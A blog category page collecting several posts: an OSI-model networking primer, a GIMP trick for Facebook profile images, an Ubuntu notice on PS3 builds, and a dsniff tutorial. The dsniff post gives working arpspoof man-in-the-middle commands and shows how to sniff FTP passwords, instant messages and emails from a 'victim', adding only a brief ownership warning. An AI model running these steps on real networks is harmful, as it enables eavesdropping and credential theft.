UrFix's Blog

A geek without a cause

Category: Hacks

  • A network is a communication system that helps computers interact with each other. To enable this interaction, certain rules must be followed. These rules are known as protocol. A protocol is nothing but a set of rules or formats that are followed to create a means of effective communication between two or more computers. It is very difficult to build a protocol that is sufficient to cater to various kinds of applications and computers. Therefore, the need for a common platform that supports protocols at various levels of communication arises. Such a platform is the OSI reference model.
    blog.urfix.com will discuss the different layers of the OSI reference model.

    You will also learn in greater detail about the important layers of network security.

     

    Open Systems Interconnection (OSI)

    The OSI reference model is an open set of definitions that presents a common technical framework for standardization of communication. This framework provides an infrastructure that is sufficient to place mandatory and optional components of effective communication in place. The OSI reference model is divided into several layers. Each layer provides a plug-in space to various components involved in networking. The layers of the OSI reference model are illustrated below.

    osi-model

    The layers of the OSI reference model are as follows:

    • Physical layer
    • DataLink layer
    • Network layer
    • Transport layer
    • Session layer
    • Presentation layer
    • Application layer

    Let urfix.com explain each of these layers

    Physical Layer

    The physical layer is essentially the hardware support layer for networking equip-
    ment. This layer provides electrical and functional characteristics to initialize,
    maintain, and deactivate physical network links. Network links send bit streams
    of data and understand information only in the form of individual bits. The
    cabling used in a network is an example of a component that operates in the phys-
    ical layer of the OSI model.

    The physical layer takes care of the following components in a network:

    • Transmission medium
    • Means of signaling
    • Timing and clocks
    • Synchronous serial communication

    Network security is not limited to intrusions; it also involves choosing the right
    type of hardware while setting up your network. Therefore, though the physical
    layer might not seem to be a very important part in a secure network, you can’t
    overlook it. For example, poor quality cabling might save initial infrastructure
    costs, but in the long run, it can lead to data loss even in the best protocols, such
    as the User Datagram Protocol (UDP), and cause severe network performance
    problems with other reliable protocols. Therefore, you should always use stan-
    dardized networking equipment and avoid bizarre configurations for your net-
    work—even if investing in standard networking components pushes the
    networking budget a little higher.

    Data Link Layer

    The data link layer is the second basic layer of the OSI model. It provides a func-
    tional and procedural medium for the exchange of data between network entities.
    This layer understands data in the form of characters and enables you to initialize
    and maintain data link connections. An example of a component that functions in
    this layer of the OSI model is the standard of the Institute of Electrical and Elec-
    tronic Engineers (IEEE), the IEEE 802.3 or Ethernet. Ethernet is a widely
    accepted standard for LAN, and it can accommodate up to 1024 nodes. If the
    distance is greater, the High-Level Data Link Control (HDLC)-based networks
    are used.

    Network Layer

    The network layer is an important layer from the point of view of a network
    administrator. This layer encapsulates most upper layers of the OSI model and
    provides point-to-point interaction between the two networking components in
    the upper layer. Some components of this layer, such as IP, Routers, and ICMP,
    are important for network security. These components are discussed in the fol-
    lowing sections.

    Internet Protocol

    Internet Protocol (IP) operates in the third layer of the OSI model and provides
    encapsulation facilities to protocols that operate in the higher levels of the model.
    An example of this is shown below.

    Encapsulation of an ICMP packet within the IP protocol.

    The IP protocol uses datagrams to communicate over a packet-switched network.
    In a packet-switched network, every packet of data that is traveling through a
    network is treated as a separate entity. The packet contains a header information
    section, which contains the address of the recipient, and other important details
    about the data within the packet. Intermediate systems, such as routers (discussed
    in the next section) use this header information to forward the packet to the cor-
    rect path or return an error message if the packet cannot be forwarded. An IP
    datagram is depicted below.

    Structure of an IP datagram.

     

    Following is the structure of the IP packet header:

    • Version. This is the version of the IP.
    • IP Header Length. This field contains the size of the IP header. Note
      that this field contains only the length of the IP header and not the
      combined length of all headers that may be encapsulated inside the
      IP packet.
    • Type of Service. This field is usually set to zero and defines the “quality”
      of service that is expected from a network.
    • Packet Size. This field contains the total size of the packet, which is the
      sum of the size of the header and the size of actual data.
    • Identification. This is a 2-byte number that is used by recipient comput-
      ers to arrange fragmented data packets before merging them. More
      information on packet fragmenting and merging can be found in the
      “Routers” section of this chapter.
    • Flags. This is a combination of three bits that inform the intermediate
      systems about the fragmenting feasibility for a packet. The field also
      contains the Don’t Fragment (DF) flag of the IP packet.
    • Fragmentation Offset. This is a 13-bit byte count that starts from the
      first byte of the original packet (the packet before any fragmentation).
      This counter helps the end system, or the recipient computer, to confirm
      correct re-assembly of the packet.
    • Time To Live. This field contains an 8-bit number of hops that a packet
      can sustain. A packet can be routed only up to a certain number of times,
      which is specified in this field. This is done to avoid a scenario in which a
      packet continues to hop infinitely inside a network. Every time a packet
      is passed through a network, this number is decremented by the router.
    • Protocol. This field specifies the type of packet that is encapsulated
      inside the IP packet. A specific number represents each higher level,
      encapsulated protocol type. For example, if the packet being carried is an
      ICMP packet, the value of this field is 1. Similarly, if the packet is a
      TCP packet, the value of this field is 6.
    • Header Checksum. This field is a checksum number that can inform the
      recipient or an intermediate system whether the IP header is corrupted.
      End recipients or intermediate systems discard packets if the checksums
      are wrong. The checksum is initially inserted by the sender of the packet
      and can be updated by every intermediate system if any changes (such as
      fragmentation) are made to the packet.
    • Source Address. This is the IP address of the original sender of the
      packet. This field can be dangerously modified to spoof the identity of
      the sender during a network attack.
    • Destination Address. This is the IP address of the final recipient of the
      IP packet.
    • Options. The options are almost never used. If they are used, however,
      the size of the IP header can be increased.

    Routers

    Routers are computers or gadgets that do not directly store usernames or act as a
    server or a client. Routers operate at the Network Layer 3 (L3) of the OSI model.
    They forward data to the intended recipient. Routers may be used to connect two or more IP networks or to connect an IP network to an Internet connection.
    Although routers need not know the information being sent through them, they
    might modify certain aspects of the information to enable information packets to
    reach the correct destination.
    A router, in physical terms, consists of a computer with a minimum of two net-
    work interface cards. Both these network cards should support IP. A router
    receives a packet from each interface and forwards the received packets to an
    appropriate output network interface. All packets received by the router have
    DataLink layer (L2) protocol headers. The router removes these headers and adds
    a new DataLink Layer header to the packet. After the new header is added to the
    packet, it can be transmitted using the appropriate network interface.
    A router reads the network layer header or IP header information before it can
    decide the following:

    • Should the packet be forwarded?
    • Which network interface should the packet be forwarded to?

    A series of steps is involved in routing a packet. These steps are shown here:

    1. The router receives a packet.
    2. The packet’s header information is extracted.
    3. The destination IP address of the packet is extracted.
    4. If the size of the packet is larger than the Maximum Transfer Unit
    (MTU) and the packet’s header information has a Don’t Fragment (DF)
    flag set, the packet is discarded. A message of failure is sent to the origi-
    nal sender of the packet.
    5. If the size of the packet is larger than the MTU but the DF flag is not
    set, the packet is broken down into smaller fragments.
    6. The best path for the packet is found by searching the routing table
    stored inside the router.
    7. If the size of the original packet is larger than the MTU, the small frag-
    ments are dispatched through the appropriate network interface. Other-
    wise, the packet is forwarded to its destination address.
    8. The packet fragments are collected at the destination and reassembled.

    Routing tables have the same format as the tables in network bridges
    and switches. The difference is that routers are identified by the IP addresses of
    computers instead of MAC hardware addresses.

    The routing table is nothing but a list of known IP destination addresses and the
    associated network interfaces that can be used to reach the destinations. Routers
    also have a provision for a default network interface. This interface may be used
    for all addresses that are not mentioned in a routing table. Routers also provide
    packet filters. The packet filter simply discards unwanted packets, which can
    cause an unnecessary overload on networks. The filter can be used as a firewall,
    and unsupported protocols can be blocked outside the router. Such a firewall, to
    some extent, can provide basic security to prevent unauthorized users from enter-
    ing a network using remote computers.
    The basic purpose of a router is to forward packets from one IP network to
    another IP network. A router determines the broadcast IP destination of a net-
    work from the logical AND of an IP address and its associated subnet mask. If a
    router isn’t configured properly, a serious security threat can occur when a packet
    is sent to a network broadcast address. If a large number of packets is forwarded,
    your network might face the problem of network overload.
    Routers are often used to connect different types of networks. A router can connect networks that use totally different link methodologies. For example, an HDLC link can connect a WAN to an Ethernet-based LAN, as shown below

    Role of routers in a network.

    The important thing to note here is that each of these networks has a different
    MTU. This is due to the fact that optimization levels for packet sizes are differ-
    ent for the two networks. Therefore, whenever a packet comes from the network
    that has a bigger MTU and needs to go to the network with a smaller MTU

     

    Transport Layer

    The fourth layer in the OSI reference model is the transport layer. This layer facil-
    itates data transfer between two end systems by encapsulating the data packet
    within the network layer data packet. Two important components of the transport
    layer are TCP and the UDP protocol, which are discussed in detail in this section.

    TCP is a connection-oriented and reliable transport protocol. A connection-ori-
    ented protocol implies that two hosts, wanting to communicate with each other,
    must first establish a connection before actual data exchange can take place. In
    TCP, a connection is established using a three-way handshake. TCP assigns
    sequence numbers to every packet in each segment, and all data received is
    responded to with an acknowledgement to the sender. TCP hides perplexing net-
    work details from the upper layers of the IP protocol.

    Information Fields in a TCP Packet
    A typical TCP packet contains the following six information fields along with
    actual data:

    • Synchronize Sequence Numbers (SYN). This field is valid only during
      the three steps involving the handshake. The sequence number is read by
      the receiving host and is stored as the client computer’s first sequence
      number. TCP sequence numbers are 32-bit numbers, ranging from 0 to
      4,294,967,295(2 ^ 32). Every packet of data that is exchanged between
      two computers using a TCP connection is sequenced.
    • Acknowledgement (ACK). This field is generally set. The acknowledge-
      ment number field in the TCP header contains the assumed value of the
      next sequence number. This field is also an acknowledgement of the data
      received in the previous packet.
    • Reset (RST). This field informs the other computer that the connection
      has been dropped and all memory structures have been flushed.
    • Urgent (URG). This field informs the other computer to process data on
      a priority basis.
    • Push (PSH). This field informs the other computer to pass the data to
      the concerned application as soon as possible instead of putting the data
      in the queue. This flag is generally set in interactive connections, such as
      Telnet, rlogin, and some chat applications.
    • Finish (FIN). This field informs the other computer that the transmis-
      sion of data is complete, but the host is still open to accepting data.

    User Datagram Protocol (UDP)

    The US Department of Defense (DoD) developed UDP for use with IP. Unlike
    TCP, which first tries to establish a reliable connection with the server, UDP
    works on the concept of “best-effort mechanism.” However, UDP is an unreliable
    protocol for communication because of the following reasons:

    1. No error is generated for lost data packets.
    2. No error is generated for duplicate packets.
    3. No assurance is provided that a packet has reached the destination safely.

    In simpler terms, UDP is a one-way protocol—what is sent from the client
    is gone for good. The client will never hear any further information about this
    packet.
    Although some reliability is provided in UDP, the end recipients reject packets
    that are corrupted during transit. It’s the responsibility of the upper layer applica-
    tion to check such loss. In addition, because no packet acknowledgement is
    required in UDP, the network load is reduced to a certain extent.

    Structure of a UDP packet.

     

     

    The UDP header consists of four fields, each two bytes in length:

    • Source Port
    • Destination Port
    • UDP Data Length
    • UDP Checksum

    UDP is unsuitable for many applications, although the simplicity of the protocol
    gives performance advantage to those applications that do not require much reli-
    ability. An example of such an application is one that pertains to streaming video
    and audio content.

     

    What Are Ports?

    Port is a term that is used often in networking. Regardless of whether your computer is online or offline, your computer has a number of open channels to which various programs or other computers can connect. These channels are known as ports. Obviously, if your computer isn’t connected to a network, only the local program will be able to access these ports. Once a computer is online, however, anyone on the network can execute a client program on their remote computer to connect to these ports. Ports are channels created between two computers for the exchange of information. A computer can have many open ports for receiving connection requests. For example, a server that has SSH, HTTP, SMTP, POP, FTP, and Telnet services can have five open ports. The default port numbers of SSH, HTTP, SMTP, POP, FTP, and Telnet are 22, 80, 25, 110, 21, and 23, respectively. These ports are not hardware components, but are like virtual stations within your computer’s memory. All computers have them, including the server you dial to access the Internet. When a computer is turned on, a number of ports are virtually created. These remain open and search for programs that are running on remote or local computers. This process is known as listening. If another computer wishes to connect to a port on your computer, it can do this in two ways: by being offered a port address to connect to, or by scanning available open ports. Sometimes, your computer willingly gives a port number to another computer to make a connection. At other times, the other computer might just guess or try one of the universally known port numbers. However, hackers might also choose to run a port scan through your computer from a remote location. A port scanner is software that allows a user to search all ports that a server is listening to. When such a program is used, the user simply has to type the IP address of the desired computer, and the scanner presents a complete report of all ports that are being listened to by the host computer.

    Session Layer and Presentation Layer

    The session layer is the fifth layer in the OSI model, and it offers a channel to ses-
    sion-based services, such as:

    • Telnet. Telnet is a protocol that can be used to perform remote logins
      and operate a remote computer from a virtual terminal.
    • FTP. FTP is used for transferring files between two connected
      computers.

    Both these protocols maintain user sessions from the time they log on to the time
    they log out. The session layer supports a feature that helps in structuring response
    dialogues between computers. This feature allows two-way simultaneous or alter-
    native cross-network operations.
    The presentation layer supports a common syntax and provides conversion facili-
    ties from one type of network to another. This layer also permits computers to be
    referenced by their names, rather than by their difficult-to-remember addresses.
    The presentation layer defines how applications should use a network. An exam-
    ple of a component that operates in this layer is the SMB protocol. The SMB pro-
    tocol provides naming facilities and file sharing features in Windows and
    UNIX-based networks, using appropriate servers.

    Application Layer

    The application layer is the uppermost layer in the OSI model. This layer is used
    directly by applications. Data belonging to this layer cannot generally travel in a
    network on its own and requires encapsulation by another layer to reach the destination.
    The application layer can be considered the cause of the existence of all other layers of the OSI model. The other layers in the OSI model carry the application
    layer data. All services in a server send application layer data packets. Similarly, all client programs exchange data using this protocol. This layer does all the actual work and is supported by the other layers. Some programs that operate in this layer are

    • E-mail servers and clients, such as sendmail
    • Web servers and clients, such as Apache
    • DNS servers, such as Bind

    Summary

    You learned about the different layers of the OSI model and their
    roles in a network. I discussed the data link, network, transport,
    session, presentation, and application layers of the OSI reference model.
    UrFix knows you will find these basic fundamentals in all networking technologies that use
    the Internet.

     

     

  • There are a lot of changes in Facebook lately, small and large which you can read about in great detail at TechCrunch.

    Here are a few:

    • A stream of your recent tagged photos appears at the top of the screen, and there are more pictures of your friends on the page. This is because the main problem with Facebook is that there weren’t enough opportunities to see pictures of people.
    • Now there’s a field on your page called “philosophy,” which folds in your religious, political views and favorite quote. Plus a brand new field: “People Who Inspire You.” (If you put Mark Zuckerberg you should be able to get access to a special Super Facebook.)
    • All your vital stats are squished up under your name in a list now. It actually looks pretty good, like you’re a character in a Role Playing Game or something!
    • There is also a field for sports, if you can somehow fit physical activity in between checking your Facebook profile
    • Tabs bring up different sections of your profile. Tabs: So hot right now.

    I’m going to show you how to create the “Famous New Profile Hack” using GIMP

    Let’s begin

    Start by picking the picture you would like to use.

    Take a screen-shot of your Facebook profile

    open your new profile screen-shot inside of GIMP

    Paste the first picture you chose to use in step one as a new layer

    Now grab the GIMP side ruler and drag two guide 200 width and 600 height

    now grab the select tool and copy in between the new guides

    and select Edit-> Paste as new image.

    save that new image as profile.jpg

    now create a guide for each small picture in the profile

    zoom in if you have to.

    I decreased the opacity of the original picture just to see if it will align properly

    Now with the select tool grab the first box

    copy

    and paste it as new image

    copy each box and paste as new image for the rest of the boxes.

    Now we should have 5 small pictures and the long profile picture

    Go to Facebook, Create a album and make sure “EVERYONE” is selected

    Upload the picture labeled profile.jpg and make this your profile picture

    We are almost done

    now start tagging your photos

    start from last to first

    Select the last pic and tag as yourself


    hit previous and tag the next one and so forth



    You are done. Wasn’t that easy

  • PS3 CD builds stopped for Natty

    Official Statement

    Of course, Sony offered the option to not update your PS3 console if you still wanted to have a Linux operating system installed on it (or to back up your data from the Linux partition), but, on the other hand, you will no longer have access to various important features, such as signing into the PlayStation Network!

    http://news.softpedia.com/news/It-s-Official-Sony-Doesn-t-Support-Linux-Anymore-139051.shtml

    http://blog.us.playstation.com/2010/03/28/ps3-firmware-v3-21-update/

    The new update release notes said very clear that it would remove the “Other OS” function!

    If you have a good reason why we should keep building PS3 CD images for
    Natty, and are willing to step up as a developer to help support them,
    then please reply to ubuntu-devel at lists.ubuntu.com.
    
    
  • urlsnarf

    urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

    I want to talk about a set of tools that have given me the creeps, not only because of it’s power, but because of its simplicity in carrying sniffing techniques. This is the dsniff suite, a wonderful set of tools designed by Dug Song to audit your own network, but in the hands of ‘others’ becomes the “bastards kit”.

    There are a few reasons why you would want to use this tool
    1) You host a web server and want to monitor websites viewed and were they referred from (in real-time)
    2) You offer linux proxy shells and want to see websites your guest are viewing
    3) Sniff websites visited on lan
    4) Spy on your users

    Installing this tool is easy and simple:

    apt-get install dsniff

    The suite consists of the following tools:

    * dsniff -> Password Sniffer
    * filesnarf -> Capture and save files via NFS past
    * mailsnarf -> Capture POP3 and SMTP traffic, save the output in mailbox format
    * msgsnarf -> Logs messages instant messaging sessions msn type.
    * webspy -> View real-time web traffic to the victim by injecting traffic into the browser.
    * arpspoof -> poisons the ARP cache
    * dnspoof -> Fake DNS Responses
    * macof -> floods the network with fake MAC addresses causing DoS
    * sshow -> Analyze traffic in SSH version 1 and 2
    * tcpkill – Kill established connections
    * tcpnice -> Slows down connections.

    Simple URL Capture

    urlsnarf -i eth0


    Cleaning up. Using the default urlsnarf mode also gives you a lot of crap to deal with using

    urlsnarf -i eth0 |cut -d\" -f4

    only displays the site visited.

    MITM

    The first attack we’re going to see is to how make a classic MITM, we will then shuttle to other attacks.
    For this we will use arpspoof. Suppose we have the following scenario:

    Vict (192.168.1.33) <—> Rout (192.168.1.1 )<—> Atac (192.168.1.35)

    To get the MITM we have to make the connection between the victim and the router pass before us, and also to reverse the connection between the router and the victim will also pass by us, leaving the scene as follows:

    =============== ============== Router Attacker Victim

    To do this open a terminal in root console and do:

    arpspoof -i eth0 -t 192.168.1.33 192.168.1.1

    then in another terminal at root, we cover the second channel of communication:

    arpspoof -i eth0 -t 192.168.1.1 192.168.1.33

    Notice that we are forwarding to act as a router and send packets to its rightful owner.

    echo 1 > /proc/sys/net/ipv4/ip_forward

    if we do this, the traffic is cut to the victim and your connection is lost, and you might be discovered.

    Now we can check if the attack is underway by a arp -a, we know because the MAC address of the router will coincide with ours. We have poisoned the ARP cache of the victim and the IP packets the router will be sent to our MAC address. We can also detect if we are victims of this attack if our MAC’s ARP table contains duplicate.

    Important! Do not close any windows console which is running arpspoof, since it would stop the attack!
    We have now launched the MITM.

    Stealing FTP passwords

    I know it is no myth that the of FTP is not secure, but to illustrate how it works dsniff will suffice;)
    Once the MITM attack has been placed on the machine we listen via dsniff with:

    dsniff -i eth0

    Now go to the victim machine and open an FTP session with any provider …
    Seems like dsniff has something for us!

    Spy Messenger Conversations

    It is also possible to spy on conversations using msgsnarf tool.
    Having previously made the MITM we do:

    msgsnarf -i eth0

    Now the whole msn conversation will be displayed on your screen.

    Capture emails

    Activating mailsnarf:

    mailsnarf -i eth0

    We are able to capture all emails sent via Outlook, Thunderbird … etc from our victim. If you also activate, dsniff probably captured the password to the email account.  With mailsnarf we will get the body of the message sent.

    WARNING!! Do not do this on any networks that you do not own. Unless you are a PAID administrator or it is your own network I highly advice against any of these techniques.

Chat

Hi 👋, how can we help?